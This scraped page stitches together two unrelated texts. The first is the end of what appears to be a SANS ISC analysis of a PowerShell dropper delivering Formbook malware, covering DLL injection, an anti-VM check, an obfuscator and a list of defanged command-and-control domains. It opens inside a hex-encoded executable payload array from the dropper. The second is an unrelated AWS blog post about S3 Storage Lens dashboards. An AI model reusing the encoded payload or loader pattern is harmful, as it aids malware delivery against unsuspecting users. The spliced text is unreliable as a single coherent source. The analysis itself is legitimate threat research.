@00,@00,@00,@00,@00,@00,@C0,@00,@00,@00,@0E,@1F,@BA,@0E,@00,@B4,@09,@CD,@21,@B8,@01,@4C,@CD,@21,@54,@68,@69,
@73,@20,@70,@72,@6F,@67,@72,@61,@6D,@20,@63,@61,@6E,@6E,@6F,@74,@20,@62,@65,@20,@72,@75,@6E,@20,@69,@6E,@20,
...
0,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00'.replace('@','0x'))| g

This is the main payload dropped by the Powershell (SHA256:A07AE0F8E715E243C514B8DA6FD83C5955E1C8EDE5EEBF4D6494EE97443AAD95). Same here, it's not available on VT yet.

The payload is executed via the following code:

[QuotingUtilities]::SplitUnquoted('control.exe',$HNAUVVBGYKNXXMOTZHSTOHTKRMID)

This function is provided by the injected DLL:

This function implements an interesting anti-VM check that, if running in a virtualized environment, stop the Powershell and prevent the payload to be executed:

Note that I don't know why a popup message is displayed. The goal of malware is to operate below the radar… (maybe the code is still being debugged by the attacker?)

Here is how the VMware environment is detected:

(Maybe there are other tests performed but I did not investigate further)

The DLL is also obfuscated with a tool that I never met before:

If you have more information about this "Zephyrus Protector" tool, please share with me!

The Formbook sample tries to contact the following hosts:

www[.]zenhalklailiskiler[.]online 
www[.]insights-for-instagram[.]com 
www[.]ketaminetherapycalgary.com 
www[.]forwardslashdevelopment[.]com 
www[.]arikmertelsanatlari[.]xyz
www[.]bklynphotography[.]com 
www[.]experiencewinneroftheyear[.]com 
www[.]kansas-chiefs[.]com 
www[.]vrefirsttime[.]com 
www[.]issahclothing[.]com 
www[.]denver-nuggets[.]club 
www[.]wwwhookeze[.]com
www[.]moxieadvice[.]com 
www[.]gangtayvietnam[.]com 
www[.]cosmosguards[.]com 
www[.]magentx2[.]info

[1] https://www.virustotal.com/gui/file/b243e807ed22359a3940ab16539ba59910714f051034a8a155cc2aff28a85088/detection
[2] https://github.com/davehardy20/PoSHBypass

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introducing Amazon S3 Storage Lens – Organization-wide Visibility Into Object Storage

This post was originally published on this site

When starting out in the cloud, a customer’s storage requirements might consist of a handful of S3 buckets, but as they grow, migrate more applications and realize the power of the cloud, things can become more complicated. A customer may have tens or even hundreds of accounts and have multiple S3 buckets across numerous AWS Regions. Customers managing these sorts of environments have told us that they find it difficult to understand how storage is used across their organization, optimize their costs, and improve security posture.

Drawing from more than 14 years of experience helping customers optimize their storage, the S3 team has built a new feature called Amazon S3 Storage Lens. This is the first cloud storage analytics solution to give you organization-wide visibility into object storage, with point-in-time metrics and trend lines as well as actionable recommendations. All these things combined will help you discover anomalies, identify cost efficiencies and apply data protection best practices.

With S3 Storage Lens , you can understand, analyze, and optimize storage with 29+ usage and activity metrics and interactive dashboards to aggregate data for your entire organization, specific accounts, regions, buckets, or prefixes. All of this data is accessible in the S3 Management Console or as raw data in an S3 bucket.

Every Customer Gets a Default Dashboard

S3 Storage Lens includes an interactive dashboard which you can find in the S3 console. The dashboard gives you the ability to perform filtering and drill-down into your metrics to really understand how your storage is being used. The metrics are organized into categories like data protection and cost efficiency, to allow you to easily find relevant metrics.

For ease of use all customers receive a default dashboard. If you are like many customers, this maybe the only dashboard that you need, but if you want to, you can make changes. For example, you could configure the dashboard to export the data daily to an S3 bucket for analysis with another tool (Amazon QuickSight, Amazon Athena, Amazon Redshift, etc.) or you could upgrade to receive advanced metrics and recommendations.

Creating a Dashboard
You can also create your own dashboards from scratch, to do this I head over to the S3 console and click on the Dashboards menu item inside the Storage Lens section. Secondly, I click the Create dashboard button.

Screenshot of the console

I give my dashboard the name s3-lens-demo and select a home Region. The home Region is where the metrics data for your dashboard will be stored. I choose to enable the dashboard, meaning that it will be updated daily with new metrics.

A dashboard can analyze storage across accounts, Regions, buckets, and prefix. I choose to include buckets from all accounts in my organization and across all regions in the Dashboard scope section.

S3 Storage Lens has two tiers: Free Metrics, which is free of charge, automatically available for all S3 customers and contains 15 usage related metrics; and Advanced metrics and recommendations, which has an additional charge, but includes all 29 usage and activity metrics with 15-month data retention, and contextual recommendations. For this demo, I select Advanced metrics and recommendations.

Screenshot of Management Console

Finally, I can configure the dashboard metrics to be exported daily to a specific S3 bucket. The metrics can be exported to either CSV or Apache Parquet format for further analysis outside of the console.

An alert pops up to tell me that my dashboard has been created, but it can take up to 48 hours to generate my initial metrics.

What does a Dashboard Show?

Once my dashboard has been created, I can start to explore the data. I can filter by Accounts, Regions, Storage classes, Buckets, and Prefixes at the top of the dashboard.

The next section is a snapshot of the metrics such as the Total storage and Object count, and I can see a trendline that shows the trend on each metric over the last 30 days and a percentage change. The number in the % change column shows by default the Day/day percentage change, but I can select to compare by Week/week or Month/month.

I can toggle between different Metric groups by selecting either Summary, Cost efficiency, Data protection, or Activity.

There are some metrics here that are pretty typical like total storage and object counts, and you can already receive these in a few places in the S3 console and in Amazon CloudWatch – but in S3 Storage Lens you can receive these metrics in aggregate across your organization or account, or at the prefix level, which was not previously possible.

There are some other metrics you might not expect, like metrics that pertain to S3 feature utilization. For example we can break out the % of objects that are using encryption, or the number of objects that are non-current versions. These metrics help you understand how your storage is configured, and allows you to identify discrepancies, and then drill in for details.

The dashboard provides contextual recommendations alongside your metrics to indicate actions you can take based on the metric, for example ways to improve cost efficiency, or apply data protection best practices. Any recommendations are shown in the Recommendation column. A few days ago I took the screenshot below which shows a recommendation on one of my dashboards that suggests I should check my buckets’ default encryption configuration.

The dashboard trends and distribution section allows me to compare two metrics over time in more detail. Here I have selected Total storage as my Primary metric and Object Count as my Secondary metric.

These two metrics are now plotted on a graph, and I can select a date range to view the trend over time.

The dashboard also shows me those two metrics and how they are distributed across Storage class and Regions.

I can click on any value in this graph and Drill down to filter the entire dashboard on that value, or select Anayze by to navigate to a new dashboard view for that dimension.

The last section of the dashboard allows me to perform a Top N analysis of a metric over a date range, where N is between 1 and 25. In the example below, I have selected the top 3 items in descending order for the Total storage metric.

I can then see the top three accounts (note: there are only two accounts in my organization) and the Total storage metric for each account.

It also shows the top 3 regions for the Total storage metric, and I can see that 51.15% of my data is stored in US East (N. Virginia)

Lastly, the dashboard contains information about the top 3 buckets and prefixes and the associated trends.

As I have shown, S3 Storage Lens delivers more than 29 individual metrics on S3 storage usage and activity for all accounts in your organization. These metrics are available in the S3 console to visualize storage usage and activity trends in a dashboard, with contextual recommendations that make it easy to take immediate action. In addition to the dashboard in the S3 console, you can export metrics in CSV or Parquet format to an S3 bucket of your choice for further analysis with other tools including Amazon QuickSight, Amazon Athena, or Amazon Redshift to name a few.

Video Walkthrough

If you would like a more indepth look at S3 Storage Lens the team have recorded the following video to explain how this new feature works.

Available Now

S3 Storage Lens is available in all commercial AWS Regions. You can use S3 Storage Lens with the Amazon S3 API, CLI, or in the S3 Console. For pricing information, regarding S3 Storage Lens advanced metrics and recommendations, check out the Amazon S3 pricing page. If you’d like to dive a little deeper, then you should check out the documentation or the S3 Storage Lens webpage.

Happy Storing

— Martin